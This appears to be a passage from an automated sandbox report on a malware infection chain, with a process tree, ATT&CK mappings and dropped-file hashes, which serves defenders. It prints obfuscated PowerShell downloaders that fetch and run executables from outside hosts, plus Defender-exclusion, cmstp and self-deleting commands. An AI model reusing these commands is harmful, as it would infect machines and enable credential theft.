                        • Executes dropped EXE
                        PID:1304
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks processor information in registry
                    PID:1192
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /pid 1192 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\636343072672842\\* & exit
                      9⤵
                        PID:1504
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /pid 1192
                          10⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1540
                • C:\Users\Public\baj.exe
                  "C:\Users\Public\baj.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2332
                • C:\Users\Public\baj.exe
                  "C:\Users\Public\baj.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2340
                • C:\Users\Public\baj.exe
                  "C:\Users\Public\baj.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2344
                • C:\Users\Public\baj.exe
                  "C:\Users\Public\baj.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:908
                • C:\Users\Public\baj.exe
                  "C:\Users\Public\baj.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:1112
                • C:\Users\Public\baj.exe
                  "C:\Users\Public\baj.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:432
                • C:\Users\Public\baj.exe
                  "C:\Users\Public\baj.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:1108
                • C:\Users\Public\baj.exe
                  "C:\Users\Public\baj.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:1628
                • C:\Users\Public\baj.exe
                  "C:\Users\Public\baj.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:1480
                • C:\Users\Public\baj.exe
                  "C:\Users\Public\baj.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:1184
                • C:\Users\Public\baj.exe
                  "C:\Users\Public\baj.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2444
                • C:\Users\Public\baj.exe
                  "C:\Users\Public\baj.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2432
                • C:\Users\Public\baj.exe
                  "C:\Users\Public\baj.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2452
                • C:\Users\Public\baj.exe
                  "C:\Users\Public\baj.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2532
                • C:\Users\Public\baj.exe
                  "C:\Users\Public\baj.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:1752
                • C:\Users\Public\baj.exe
                  "C:\Users\Public\baj.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:1656
                • C:\Users\Public\baj.exe
                  "C:\Users\Public\baj.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2508
                • C:\Users\Public\baj.exe
                  "C:\Users\Public\baj.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2564
                • C:\Users\Public\baj.exe
                  "C:\Users\Public\baj.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:1580
                • C:\Users\Public\baj.exe
                  "C:\Users\Public\baj.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:1772
                • C:\Users\Public\baj.exe
                  "C:\Users\Public\baj.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2180
                • C:\Users\Public\baj.exe
                  "C:\Users\Public\baj.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2400
                • C:\Users\Public\baj.exe
                  "C:\Users\Public\baj.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:1056
                • C:\Users\Public\baj.exe
                  "C:\Users\Public\baj.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2580
                • C:\Users\Public\baj.exe
                  "C:\Users\Public\baj.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2656
                • C:\Users\Public\baj.exe
                  "C:\Users\Public\baj.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2120
                • C:\Users\Public\baj.exe
                  "C:\Users\Public\baj.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:1556
                • C:\Users\Public\baj.exe
                  "C:\Users\Public\baj.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2680
                • C:\Users\Public\baj.exe
                  "C:\Users\Public\baj.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2600
                • C:\Users\Public\baj.exe
                  "C:\Users\Public\baj.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:1784
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BC4.tmp\b1.hta"
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:1620
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1148
          • C:\Windows\SysWOW64\timeout.exe
            timeout 2
            3⤵
            • Delays execution with timeout.exe
            PID:1584
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BC4.tmp\ba.hta"
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:1452
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
              4⤵
              • Blocklisted process makes network request
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1056
              • C:\Users\Public\vdb.exe
                "C:\Users\Public\vdb.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2548
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of SetWindowsHookEx
                  PID:2608
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks processor information in registry
                    PID:2812
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /pid 2812 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\889313543729181\\* & exit
                      8⤵
                        PID:2952
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /pid 2812
                          9⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3008
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of SetWindowsHookEx
                    PID:2640
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                      7⤵
                      • Executes dropped EXE
                      PID:2896
                  • C:\Users\Public\vdb.exe
                    "C:\Users\Public\vdb.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Drops desktop.ini file(s)
                    • Modifies system certificate store
                    PID:2692
                    • C:\Users\Admin\AppData\Local\Temp\4NSJIQjcNW.exe
                      "C:\Users\Admin\AppData\Local\Temp\4NSJIQjcNW.exe"
                      7⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2984
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                        "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\4NSJIQjcNW.exe"'
                        8⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2336
                    • C:\Users\Admin\AppData\Local\Temp\m15WXhxItf.exe
                      "C:\Users\Admin\AppData\Local\Temp\m15WXhxItf.exe"
                      7⤵
                      • Executes dropped EXE
                      PID:3068
                      • C:\Windows\SysWOW64\Notepad.exe
                        "C:\Windows\System32\Notepad.exe"
                        8⤵
                          PID:2052
                      • C:\Users\Admin\AppData\Local\Temp\FIv2XzcfoG.exe
                        "C:\Users\Admin\AppData\Local\Temp\FIv2XzcfoG.exe"
                        7⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of SetWindowsHookEx
                        PID:2952
                        • \??\c:\windows\SysWOW64\cmstp.exe
                          "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\b42aekby.inf
                          8⤵
                            PID:1956
                        • C:\Users\Admin\AppData\Local\Temp\YYlAKkgsbm.exe
                          "C:\Users\Admin\AppData\Local\Temp\YYlAKkgsbm.exe"
                          7⤵
                          • Executes dropped EXE
                          • Windows security modification
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3036
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "powershell" Get-MpPreference -verbose
                            8⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2472
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\vdb.exe"
                          7⤵
                            PID:2224
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /T 10 /NOBREAK
                              8⤵
                              • Delays execution with timeout.exe
                              PID:2320
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BC4.tmp\ba1.hta"
                    3⤵
                    • Modifies Internet Explorer settings
                    • Suspicious use of WriteProcessMemory
                    PID:1388
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1952

              Network

              MITRE ATT&CK Matrix ATT&CK v6

              Persistence

              Modify Existing Service

              1
              T1031

              Defense Evasion

              Modify Registry

              4
              T1112

              Disabling Security Tools

              2
              T1089

              Install Root Certificate

              1
              T1130

              Credential Access

              Credentials in Files

              3
              T1081

              Discovery

              Query Registry

              2
              T1012

              System Information Discovery

              2
              T1082

              Collection

              Data from Local System

              3
              T1005

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\ProgramData\softokn3.dll
              • C:\ProgramData\softokn3.dll
              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0e84e49e-bad7-4520-aadc-6ae7078e6c91
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1a1733a9-c78a-41f9-ba49-7e78bc3e775b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_478c05f3-b801-4912-91bd-47646e127596
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4fd4a7fe-82f5-41e4-888c-1b7eac83ece7
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_51c93106-73be-4184-8b5d-b4c69459aa2f
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5a90f1c6-0c8a-4724-814f-68ce6d170f2f
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a2ebb337-3027-47ef-8098-8d2e9f7615cf
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ca37ad88-4ce8-48e7-a2ed-ec10658dba29
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d3995a53-1ed1-4007-aa56-c31e24f8fffd
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e10aa6dc-f3ff-45e4-9eec-4fef42847693
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e1dd9aab-0fd1-4532-ba7f-00569c2741ef
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              • C:\Users\Admin\AppData\Local\Temp\4NSJIQjcNW.exe
              • C:\Users\Admin\AppData\Local\Temp\4NSJIQjcNW.exe
              • C:\Users\Admin\AppData\Local\Temp\BC4.tmp\Keygen.exe
              • C:\Users\Admin\AppData\Local\Temp\BC4.tmp\Keygen.exe
              • C:\Users\Admin\AppData\Local\Temp\BC4.tmp\b.hta
              • C:\Users\Admin\AppData\Local\Temp\BC4.tmp\b1.hta
              • C:\Users\Admin\AppData\Local\Temp\BC4.tmp\ba.hta
              • C:\Users\Admin\AppData\Local\Temp\BC4.tmp\ba1.hta
              • C:\Users\Admin\AppData\Local\Temp\BC4.tmp\m.hta
              • C:\Users\Admin\AppData\Local\Temp\BC4.tmp\m1.hta
              • C:\Users\Admin\AppData\Local\Temp\BC4.tmp\start.bat
              • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
              • C:\Users\Admin\AppData\Local\Temp\FIv2XzcfoG.exe
              • C:\Users\Admin\AppData\Local\Temp\FIv2XzcfoG.exe
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
              • C:\Users\Admin\AppData\Local\Temp\YYlAKkgsbm.exe
              • C:\Users\Admin\AppData\Local\Temp\YYlAKkgsbm.exe
              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
              • C:\Users\Admin\AppData\Local\Temp\m15WXhxItf.exe
                MD5

                013db621a3351e3fb049efd2ccad79ff

                SHA1

                a23394ea54dbc5342a77938a2c285ee616185560

                SHA256

                df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                SHA512

                1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              • C:\Users\Public\baj.exe
              • C:\Users\Public\baj.exe
              • C:\Users\Public\baj.exe
              • C:\Users\Public\baj.exe
              • C:\Users\Public\baj.exe
              • C:\Users\Public\baj.exe
              • C:\Users\Public\baj.exe
              • C:\Users\Public\baj.exe
              • C:\Users\Public\baj.exe
              • C:\Users\Public\baj.exe
              • C:\Users\Public\baj.exe
              • C:\Users\Public\baj.exe
              • C:\Users\Public\baj.exe
              • C:\Users\Public\baj.exe
              • C:\Users\Public\baj.exe
              • C:\Users\Public\baj.exe
              • C:\Users\Public\baj.exe
              • C:\Users\Public\baj.exe
              • C:\Users\Public\baj.exe
              • C:\Users\Public\baj.exe
              • C:\Users\Public\baj.exe
              • C:\Users\Public\baj.exe
              • C:\Users\Public\baj.exe
              • C:\Users\Public\baj.exe
              • C:\Users\Public\baj.exe
              • C:\Users\Public\baj.exe
              • C:\Users\Public\baj.exe
              • C:\Users\Public\baj.exe
              • C:\Users\Public\baj.exe
              • C:\Users\Public\baj.exe
              • C:\Users\Public\baj.exe
              • C:\Users\Public\baj.exe
              • C:\Users\Public\nfv.exe
              • C:\Users\Public\nfv.exe
              • C:\Users\Public\nfv.exe
              • C:\Users\Public\vdb.exe
              • C:\Users\Public\vdb.exe
              • C:\Users\Public\vdb.exe
              • C:\Windows\temp\b42aekby.inf
              • \??\PIPE\srvsvc
              • \??\PIPE\srvsvc
              • \ProgramData\mozglue.dll
              • \ProgramData\mozglue.dll
              • \ProgramData\mozglue.dll
              • \ProgramData\msvcp140.dll
              • \ProgramData\msvcp140.dll
              • \ProgramData\msvcp140.dll
              • \ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

              • \ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

              • \ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

              • \ProgramData\sqlite3.dll
              • \ProgramData\sqlite3.dll
              • \ProgramData\sqlite3.dll
              • \ProgramData\vcruntime140.dll
              • \ProgramData\vcruntime140.dll
              • \ProgramData\vcruntime140.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                MD5

                02cc7b8ee30056d5912de54f1bdfc219

                SHA1

                a6923da95705fb81e368ae48f93d28522ef552fb

                SHA256

                1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                SHA512

                0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
              • \Users\Admin\AppData\LocalLow\sqlite3.dll
              • \Users\Admin\AppData\Local\Temp\4NSJIQjcNW.exe
              • \Users\Admin\AppData\Local\Temp\BC4.tmp\Keygen.exe
              • \Users\Admin\AppData\Local\Temp\FIv2XzcfoG.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              • \Users\Admin\AppData\Local\Temp\YYlAKkgsbm.exe
              • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
